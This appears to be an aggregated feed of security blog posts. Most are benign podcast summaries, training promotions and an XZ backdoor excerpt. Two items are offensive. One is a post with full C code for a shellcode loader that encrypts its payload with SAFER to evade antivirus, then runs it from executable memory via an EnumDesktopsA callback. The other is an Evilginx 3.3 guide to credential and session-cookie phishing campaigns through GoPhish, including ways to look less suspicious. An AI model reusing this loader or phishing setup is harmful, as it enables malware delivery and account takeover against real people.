Fortifying the Chain: A Proven Strategy for Supply Chain Defense
The post Fortifying the Chain: A Proven Strategy for Supply Chain Defense appeared first on Horizon3.ai.
Accelerate your DevOps journey with OffSec. Build secure, scalable, and efficient software delivery pipelines through real-world training.
The post Infrastructure Automation and Defense: Introducing DevSecOps Essentials appeared first on OffSec.
Today on Cyber Work, we are talking operational technology, or OT, security with guest, Robin Berthier of Network Perception. From his earliest studies to his time as an academic researcher, Berthier has dedicated his career to securing the intersection between operational technology and network security, with some pretty imaginative solutions to show for it. In today’s episode, Berthier explains why modern OT security means thinking more about the mechanics of the machinery than the swiftness of the software solutions, the big conversation that infrastructure and ICS Security need to have about nation-state attackers (and finally are having!) and Berthier's best piece of career advice turns into some excellent thoughts on the importance of maintaining your network… and I don’t mean routing and switching!
0:00 - Industrial control systems cybersecurity
1:54 - How Robin Berthier got into tech
3:38 - Majoring in cybersecurity
4:55 - Intrusion detection systems
9:18 - Mechanical and cybersecurity tools
12:33 Launching Network Perception
17:03 - Current state of ICS and OT infrastructure
20:24 - Cyberattacks on industrial control systems
28:35 -Skills needed to work in industrial control systems
35:19 - Where are ICS security jobs?
36:39 - Getting into local OT systems
37:55 - Skills gaps in ICS
39:21 - Best piece of career advice
41:01 - Cultivating a work network
43:28 - What is Network Perception?
45:27 - Learn more about Robin Berthier
45:58 - Outro
– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
Learn about the role of cybersecurity training in compliance. Discover how OffSec’s training can contribute to a strong compliance posture.
The post The Role of Cybersecurity Training in Compliance appeared first on OffSec.
Horizon3.ai Principal Security SME Stephen Gates and JTI Cybersecurity Principal Consultant Jon Isaacson discuss:
– What JTI does to validate things like access control, data loss prevention, ransomware protection, and intrusion detection approaches.
– How #pentesting and red team exercises allow orgs to validate the effectiveness of their security controls.
– Why offensive operations work best to discover and mitigate exploitable vulnerabilities in their client’s infrastructures.
The post Fireside Chat: Horizon3.ai and JTI Cybersecurity appeared first on Horizon3.ai.
Learn about the importance of cybersecurity compliance, most common cybersecurity compliance frameworks and how to navigate their complexities.
The post Cybersecurity Compliance: Understanding Regulatory Frameworks appeared first on OffSec.
Outsmart evolving cyber threats with Threat Hunting Essentials. This hands-on training path builds expertise in threat actor analysis, advanced hunting techniques, and data analysis.
The post Proactive Threat Detection: Introducing Threat Hunting Essentials appeared first on OffSec.
Stay ahead of hackers! OffSec Cyber Ranges train your team on the latest exploits for a proactive, adaptable defense.
The post The Race Against the Hackers: How the OffSec Cyber Ranges Keep You Ahead appeared first on OffSec.
Today on Cyber Work, our deep-dive into manufacturing and operational technology (OT) cybersecurity brings us to the problem of endpoint security. Tom Molden, CIO of Global Executive Engagement at Tanium, has been grappling with these problems for a while. We talk about his early, formative tech experiences (pre-Windows operation system!), his transformational position moving from fiscal strategy and implementation into his first time as chief information officer and talk through the interlocking problems that come from connected manufacturing devices and the specific benefits and challenges to be found in strategizing around the endpoints. All of the endpoints.
0:00 - Manufacturing and endpoint security
1:44 - Tom Molden's early interest in computers
4:06 - Early data usage
6:26 - Becoming a CIO
10:29 - Difference between a CIO and CISO
14:57 - Problems for manufacturing companies
18:45 - Best CIO problems to solve in manufacturing
22:51 - Security challenges of manufacturing
26:00 - The scop of endpoint issues
33:27 - Endpoints in manufacturing security
37:12 - How to work in manufacturing security
39:29 - Manufacturing security skills gaps
41:54 - Gain manufacturing security work experience
43:41 - Tom Molden's best career advice received
46:26 - What is Tanium
47:58 - Learn more about Tom Molden
48:34 - Outro
– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
Learn about the importance of clear and effective communication skills in cybersecurity.
The post Communication Skills in Cybersecurity appeared first on OffSec.
Infosec and Cyber Work Hacks are here to help you pass the CCNA exam! For today’s Hack, Wilfredo Lanz, Infosec bootcamp instructor in charge of Cisco’s CCNA certification, walks us through four sample CCNA questions, walking through each answer and discounting the wrong ones with explanations, allowing you to reach the right answer in a logical and stress-free way. And the only way you’re going to see it is by staying right here for this Cyber Work Hack!
0:00 - CCNA exam sample questions
1:31 - Different types of CCNA exam questions
3:34 - First CCNA exam sample question
8:34 - Second CCNA exam sample question
13:52 - Third CCNA exam sample question
20:47 - Fourth CCNA exam sample question
25:22 - Infosec CCNA boot camp practice exam
27:04 - Advice for CCNA exam day
28:46 - Outro
Learn more about the CCNA: https://www.infosecinstitute.com/training/ccna/
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
﷽
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on try to evasion AV engines via encrypting payload with another algorithm: SAFER. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.
SAFER (Secure And Fast Encryption Routine) is a symmetric block cipher designed by James Massey. SAFER K-64 specifically refers to the variant with a 64-bit
key size. It’s notable for its nonproprietary nature and has been incorporated into some products by Cylink Corp.
SAFER K-64 operates as an iterated block cipher, meaning the same function is applied for a certain number of rounds. Each round utilizes two 64-bit
subkeys, and the algorithm exclusively employs operations on bytes. Unlike DES, SAFER K-64 is not a Feistel network.
For practical example, here is the step-by-step flow of the SAFER-64:
// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];
// SAFER-64 encryption rounds
for (i = 0; i < ROUNDS; i++) {
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
L ^= (T + R);
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
R ^= (T + L);
}
// update the data block with the encrypted values
data_ptr[0] = L;
data_ptr[1] = R;
So, the encryption function looks like this:
void safer_encrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = 0; i < ROUNDS; i++) {
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
What about decryption logic? The decryption process is not much different from encryption:
// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];
// SAFER-64 decryption rounds
for (i = ROUNDS - 1; i >= 0; i--) {
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
R ^= (T + L);
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
L ^= (T + R);
}
// Update the data block with the decrypted values
data_ptr[0] = L;
data_ptr[1] = R;
Respectively, SAFER-64 Decryption Function looks like this:
void safer_decrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = ROUNDS - 1; i >= 0; i--) {
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
Full source code for my main logic (“malicious” payload encryption) look like this (hack.c
):
/*
* hack.c - encrypt and decrypt shellcode via SAFER. C++ implementation
* @cocomelonc
* https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#define BLOCK_SIZE 8 // 64 bits
#define ROUNDS 6
void safer_encrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = 0; i < ROUNDS; i++) {
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
void safer_decrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = ROUNDS - 1; i >= 0; i--) {
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
int main() {
unsigned char key[] = "\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77";
unsigned char my_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int len = sizeof(my_payload);
int pad_len = (len + BLOCK_SIZE - 1) & ~(BLOCK_SIZE - 1);
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len);
memcpy(padded, my_payload, len);
// encrypt the padded shellcode
for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
safer_encrypt(&padded[i], key);
}
printf("encrypted:\n");
for (int i = 0; i < sizeof(padded); i++) {
printf("\\x%02x", padded[i]);
}
printf("\n\n");
// decrypt the padded shellcode
for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
safer_decrypt(&padded[i], key);
}
printf("decrypted:\n");
for (int i = 0; i < sizeof(padded); i++) {
printf("\\x%02x", padded[i]);
}
printf("\n\n");
LPVOID mem = VirtualAlloc(NULL, sizeof(padded), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, pad_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
return 0;
}
As you can see, first of all, before encrypting, we use padding via the NOP (\x90
) instructions.
As usually, I used meow-meow
payload:
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
For simplicity, I use running shellcode via EnumDesktopsA logic.
Let’s go to see this trick in action. Compile our “malware”:
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
And run it at the victim’s machine (Windows 10 x64 v1903
in my case):
As you can see, our decrypted shellcode is modified: padding \x90
is working as expected.
Calc entropy and upload to VirusTotal:
python3 entropy.py -f ./hack.exe
24 of of 70 AV engines detect our file as malicious as expected.
As you can see, this algorithm encrypts the payload quite well, but it is detected by many AV engines and is poorly suited for bypassing them, but this is most likely due to the fact that a well-studied method of launching the payload is used. if you apply anti-debugging, anti-disassembly and anti-VM tricks, the result will be better.
The Singapore government has considered using SAFER with a 128-bit
key for various applications due to its lack of patent, copyright, or other restrictions, making it an attractive choice for widespread adoption.
I hope this post spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.
SAFER
Malware and cryptography 1
source code in github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine
The following is an excerpt from our new module on the recent XZ Utils backdoor, CVE-2024-3094.
On Mar 29, 2024, at 12:00PM ET, Andres Freund posted on the Openwall mailing list about a backdoor he discovered in the XZ Utils package. The backdoor targeted the OpenSSH binary, allowing remote code execution on impacted machines. This backdoor was not located in the GitHub repository, but only in release versions of the package, which hid its presence.
Given that XZ Utils had been installed (directly or indirectly) on billions of Linux systems worldwide, this finding stunned the international Linux and infosec communities.
Understanding the Timeline of the Attack
In late 2021,
The post Behind Enemy Lines: Understanding the Threat of the XZ Backdoor appeared first on OffSec.
Did you know that 95% of cybersecurity breaches are caused by human error? Traditional training methods often fail to address this critical factor, leaving organizations exposed. OffSec Versus, part of the Enterprise Cyber Range, is designed to change that. It’s a live-fire training environment where your Red and Blue teams learn by doing, battling head-to-head, and developing the essential collaboration skills needed to neutralize real-world attacks.
Versus Explained
OffSec Versus exists to bridge the gap between traditional cybersecurity training and the dynamic, collaborative teamwork needed to defend against modern threats.
Versus is a realistic, adversarial training environment within the Enterprise Cyber Range, enabling Red and Blue teams to engage in realistic, scored tournaments. In a real-world attack,
The post OffSec Versus: Revolutionizing Cybersecurity Training Through Live-Fire Collaboration appeared first on OffSec.
AT&T Cybersecurity’s head of evangelism, Theresa Lanowitz, is today's guest. Lanowitz has amazing and wide-ranging career achievements, from her time with analyst firms Gartner and Voke, work on Java’s JBuilder environment and strategic marketing for the Jini Project, which was proto-IoT going back to the late ‘90s! With all of these incredible stories, we talked far and wide about manufacturing security concerns, she breaks down the key pain points around edge computing and talks extensively about her love of both the English language and programming languages of all sorts. They all have grammar, they all have style, and if you’re a linguist or a lover of learning new languages, perhaps computer languages are an opportunity you hadn’t pursued? All that and a ton more – seriously, I could have talked to Lanowitz for hours – on today’s episode of Cyber Work.
0:00 - Manufacturing security
2:02 - Theresa Lanowitz’s early interest in computers
3:52 - Learning programming languages in the early days
6:12 - English language’s connection to programming language
8:24 - Evolution of programming language
11:55 - How language impacts programming
13:52 - Lanowitz’s cybersecurity career
17:20 - An average day as head of cybersecurity evangelism
22:53 - Edge computing use in manufacturing
26:35 - Biggest security issues in manufacturing
30:02 - The bad actors in manufacturing security
33:41 - Manufacturing cybersecurity technology
39:02 - Skills needed to work in manufacturing cybersecurity
41:00 - Biggest skills gaps in manufacturing security
41:44 - Best cybersecurity career advice
42:15 - Where are manufacturing security issues heading?
45:06 - Security issues with third-party vendors
47:53 - Learn more about AT&T cybersecurity
48:48 - Learn more about Theresa Lanowitz
49:04 - Outro
– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
Horizon3.ai Breaks Down Fortinet Vulnerability
Zach Hanley, Horizon3.ai Chief Attack Engineer, and James Horseman, Exploit Developer, join John Furrier of theCUBE to discuss Fortinet CVE 2022 40864.
The post Horizon3.ai Breaks Down Fortinet Vulnerability appeared first on Horizon3.ai.
Many penetration tests are only point-in-time and/or manual. In this Horizon3.ai sponsored webcast from SANS, take a First Look at how Horizon3.ai’s NodeZero takes on the pen test problem.
Listen to SANS Senior Instructor Dave Shackleford and Horizon3.ai’s CEO and Co-Founder Snehal Antani discuss the platform’s highlights and why it might be right for your organization.
The post SANS Webcast w/ Sponsor Horizon3.ai appeared first on Horizon3.ai.
Managed security service providers (MSSPs) and managed services providers (MSPs) tell us that in today’s cyber threat
environment, securing customer environments while still maintaining profit margins and growing adoption of their services is an ongoing challenge. The NodeZeroTM platform enables you to proactively and efficiently probe your customers’ networks for weaknesses that go beyond known and patchable vulnerabilities, such as credentials open to compromise, exposed data, misconfigurations, poor security controls, and weak policies.
The post NodeZero™ from Horizon3.ai Optimized for MSSPs and MSPs appeared first on Horizon3.ai.
State, local and education (SLED) organizations have unique cybersecurity pain points. Because they rely on taxpayer dollars, SLED organizations are often trying to do more with less.
The post SLED U.S. State, Local, & Education appeared first on Horizon3.ai.
Demand for #pentesting expertise is at an all-time high, and many orgs are struggling to meet their annual requirements for the PCI DSS v4.0. This webinar explains how our services fulfill your pentesting requirements and help you streamline your remediation efforts. You’ll learn about:
– Horizon3.ai’s human-machine teaming approach for compliance pentesting
– How we fully address requirement 11.4 of the PCI DSS and pentesting for the Self-Assessment Questionnaires (SAQs)
– A practitioner’s view of how #NodeZero helps orgs efficiently interpret and remediate their penetration test report
The post No waiting, no wondering: Streamline your PCI pentesting process with Horizon3.ai appeared first on Horizon3.ai.
The emphasis on technical skills and knowledge in cybersecurity has always been present. However, as the field becomes increasingly complex and intertwined with every facet of business operations, the spotlight has shifted to the indispensable role soft skills hold in cybersecurity leadership.
This perspective was the focal point of our recent webinar, led by Thereasa Roy of OffSec and featuring the insights of Jason Haddix, CEO of Arcanum Information Security. Jason delved into the pivotal role that soft skills—such as strategic communication, empathy, and storytelling—play in navigating the challenges of cybersecurity.
As we’ve seen with recent attacks like the one on casino giant MGM, cyber threats are technical but also deeply rooted in human behaviors and interactions.
The post Soft Skills for Cybersecurity Leaders: CISO’s Perspective appeared first on OffSec.
Long time no hear in terms of Evilginx updates. While I'm still working on the release of Evilginx Pro, I've decided to fix a few issues and add new features to the public version of Evilginx, in the meantime.
First of all, I wanted to thank everyone for the great feedback and insightful discussions in the BREAKDEV RED community Discord. All of the reported issues and suggestions led to the improvement of Evilginx and this update is the fruit of such great community feedback.
Additionally, I wanted to use this opportunity to thank everyone for sending their applications to access BREAKDEV RED. We've gathered an incredible number of security professionals (almost 850 at the time of writing) and every day I'm learning something new from you guys, which I'm super grateful for. Hell, I've even finally fully understood how to properly configure the SPF/DKIM/DMARC combo thanks to all the discussion on the subject.
Vetting the applications takes a lot of time and before I open the registrations again, to the public, I'd like to automate the verification process a bit. Once I do this, requesting access to the community should be more accessible to everyone.
Allowing access only to red teamers with a clean conscience is still of utmost importance to me and it is the base for creating a friendly atmosphere, which fuels guilt-free information sharing.
This time I have something special for you. Never before have I had a request so popular that it was mentioned in 90% of all BREAKDEV RED application forms. Let it be known that your pleas have been heard.
Evilginx has an official integration with GoPhish by Jordan Wright from now on!
That's right - you will finally be able to create phishing campaigns for sending emails with valid Evilginx lure URLs and enjoy all the benefits of GoPhish's lovely UI, seeing which emails were opened, which lure URLs were clicked and which clicks resulted in successful session capture.
Here is the full list of changes coming in Evilginx 3.3 together with a full guide on how to use all the new features.
I've forked GoPhish and added the integration with Evilginx in the cleanest way possible. If you were using your custom version of GoPhish, merging Evilginx integration with your own fork should be relatively easy.
I have made the integration in such a way that Evilginx will be notifying GoPhish of the following events, which occur:
I've exposed additional API endpoints in GoPhish to make it possible to change the results status for every sent email.
Now, when you create a new campaign in GoPhish, you do not have a "Landing Page" to select. Instead, you will generate a lure URL in Evilginx and paste it into the "Evilginx Lure URL" text box.
What's more, GoPhish will automatically generate the encrypted custom parameters with personalized content, retrievable by Evilginx, for each embedded link. The personalized values embedded with every phishing link embedded within the generated email message are the following:
fname
)lname
)email
)This is super useful as you can use the custom parameters further to customize the content on your phishing pages within your js_inject
scripts.
Let's say you wanted to pre-fill the email in the sign-in text box on the phishing page. Now you can just use the {email}
placeholder within your injected script and you can be sure that GoPhish will deliver the right value for you. The same goes for {fname}
and {lname}
.
GoPhish will also embed the rid
(Result ID) in the phishing link's parameters, so that Evilginx will know for which result it should update the status.
You can monitor the status of your mailing campaigns and check email deliverability, straight from GoPhish, but Evilginx will be the only side storing the credentials and authentication cookies.
First of all, you need to get GoPhish from my forked GoPhish repository. You can either grab clone the source code and build it yourself or you can grab the binaries from releases.
Deploy GoPhish on the external server. It doesn't have to be the same server Evilginx is running on, but it will have to be reachable by your Evilginx instances. You can find out how to install GoPhish in its official documentation.
Once you have GoPhish running on a remote server and you also have Evilginx deployed and ready for action, you will need to tell Evilginx how it can communicate with your GoPhish server.
For this, you will need the Admin URL of your GoPhish instance and the API key. You can find the API key within the Account Settings in your GoPhish admin panel. To figure out the IP and port of your GoPhish instance, refer to the official documentation.
For example, if your GoPhish admin server is running on an IP 1.2.3.4
listening on port 3333
, with TLS enabled, you can set it up as follows:
config gophish admin_url https://1.2.3.4:3333
config gophish api_key c60e5bce24856c2c473c4560772
If you do not use a valid TLS certificate for the exposed GoPhish instance, you may need to allow insecure TLS connections as well (such connections can be man-in-the-middled, so tread carefully):
config gophish insecure true
Once all this is configured, your Evilginx instance is ready to go. You can test if the communication with GoPhish works properly by issuing the command:
config gophish test
Here I am assuming you are familiar with how to use GoPhish. If not, feel free to check out the documentation on how to get started.
Make sure GoPhish is running either in a tmux
session or you set it up to run as a daemon. You can find more information on how to do it in this GitHub issue.
Once you have everything properly set up, it is time to set up your Campaign. Create the new campaign and then select the Email Template, Sending Profile and the group of recipients. You may notice that instead of being asked for the Landing Page profile you need to provide the Evilginx Lure URL.
Open your Evilginx instance, create the lure and grab the lure URL you want to send out in your phishing campaign, using the command:
lures get-url <id>
Copy this URL and paste it into the Evilginx Lure URL text field of the campaign creation panel.
That's it! You can now send out the campaign emails while enjoying the full overview of your campaign progress within the GoPhish UI.
Since the release of Evilginx 3.0, the tool has been using certmagic
library for TLS certificate management with automated LetsEncrypt TLS certificate registration. Having to use only LetsEncrypt certificates is often not ideal as it may mark your phishing server, on an engagement, as suspicious.
Many people have requested support to use their own TLS certificates with Evilginx, including the wildcard certificates. This feature has finally been implemented.
To add your own TLS certificates, first, create a new directory under ~/.evilginx/crt/sites/
with the name of your website or hostname. The name does not matter and it can be anything you choose.
Evilginx will scan these directories looking for the public X509 certificate and the private key used to sign the certificate. The X509 certificate should have either the .pem
or .crt
extension, while the private key should have the .key
extension.
For convenience, Evilginx will also recognize the keypair generated by CertBot, where the public certificate is named fullchain.pem
and the private key is privkey.pem
. You can copy both files into the same directory to add such a TLS certificate generated by CertBot.
Once you put your custom TLS certificates in the right place, don't forget to disable automated LetsEncrypt certificate retrieval with:
config autocert off
IMPORTANT! Make sure the private key files are not password-protected or otherwise Evilginx may fail to load them.
Example 1:
~/.evilginx/crt/sites/wildcard.domain.com/fullchain.pem
~/.evilginx/crt/sites/wildcard.domain.com/privkey.pem
Example 2:
~/.evilginx/crt/sites/my_certificate/public.crt
~/.evilginx/crt/sites/my_certificate/private.key
CertMagic library will automatically add the TLS certificates to the managed pool and it will automatically respond with a valid TLS certificate.
I know some of you use Caddy, Apache or Nginx as an additional proxy layer, sitting in front of the Evilginx instance. This created an issue for Evilginx to properly detect the origin IP address of incoming requests. Since all requests were proxied through a local web server, the origin IP would default to 127.0.0.1
, completely ignoring the additional HTTP headers added by the proxies, with the correct origin IP addresses as values.
Since this update, Evilginx will properly recognize the origin IP address of all proxied HTTP requests. The list of monitored HTTP headers is as follows:
X-Forwarded-For
X-Real-IP
X-Client-IP
Connecting-IP
True-Client-IP
Client-IP
Thanks to @yudasm_ contribution, you can now enjoy injecting your custom POST parameters within body contents transmitted in JSON format.
Check out Yehuda's recent blog post on how he used this feature to evade FIDO2 authentication when phishing MS365 accounts.
Keanu Nys reported an issue, in the BREAKDEV RED channel, where he found that one of the online URL scanners he used was able to open the phishing page by visiting the URL with just a hostname, without a valid lure URL path.
There was a bug in Evilginx, which would only enforce valid lure URLs for phishing hostnames, which were defined with session: true
in the proxy_hosts
section of the phishlet file.
Upon closer inspection, I've decided that the session
parameter never made sense and it is now obsolete. Every proxy_hosts
entry is treated as if session
was set to true
.
Keanu wrote a great post-mortem post about the bug he found, so if you're interested in learning more about it, you can find it here.
Evilginx, since forever, had a very annoying bug, which would trigger the infinite redirection loop, whenever the lure URL path was set to be the same as the login path of the targeted website.
This has now been fixed and Evilginx will also make an additional check to compare if the lure URL contains the valid phishing domain used by the landing phishing page.
Over the years, there have been multiple new TLDs launched for registering domains. Evilginx will try hard to detect all URLs in proxied packets and convert them either from phishing domains to original domains or from original domains to phishing domains.
To be more efficient, it relies on the detection of URLs ending with known TLDs. Some of the newer TLDs have not been supported and this update changes that.
Here is the new list of all supported TLDs:
aero
arpa
art
biz
bot
cat
click
cloud
club
com
coop
edu
game
gov
inc
info
ink
int
jobs
live
lol
mil
mobi
museum
name
net
online
org
pro
root
shop
site
tech
tel
today
travel
vip
wiki
xyz
[all known 2 character TLDs]
Here is the whole Evilginx 3.3 changelog with some additional changes and fixes I did not mention in this post:
~/.evilginx/crt/sites/<hostname>/
. Will load fullchain.pem
and privkey.pem
pair or a combination of a .pem
/.crt
(public certificate) and a .key
(private key) file. Make sure to run without -developer
flag and disable autocert retrieval with config autocert off
.force_post
POST parameters into JSON content body (by @yudasm_).config autocert <on/off>
.__Host-
and __Secure-
.unauth_url
can now be set to an empty string to have the server return 403
on unauthorized requests.proxy_hosts
with session: false
(default) making it easy to detect evilginx by external scanners.127.0.0.1
is now ignored from being added to the IP blacklist.xyz
, art
, tech
, wiki
, lol
& more)I'm happy to have finally been able to include the most requested features, together with some quality-of-life improvements, before the Evilginx Pro release this year.
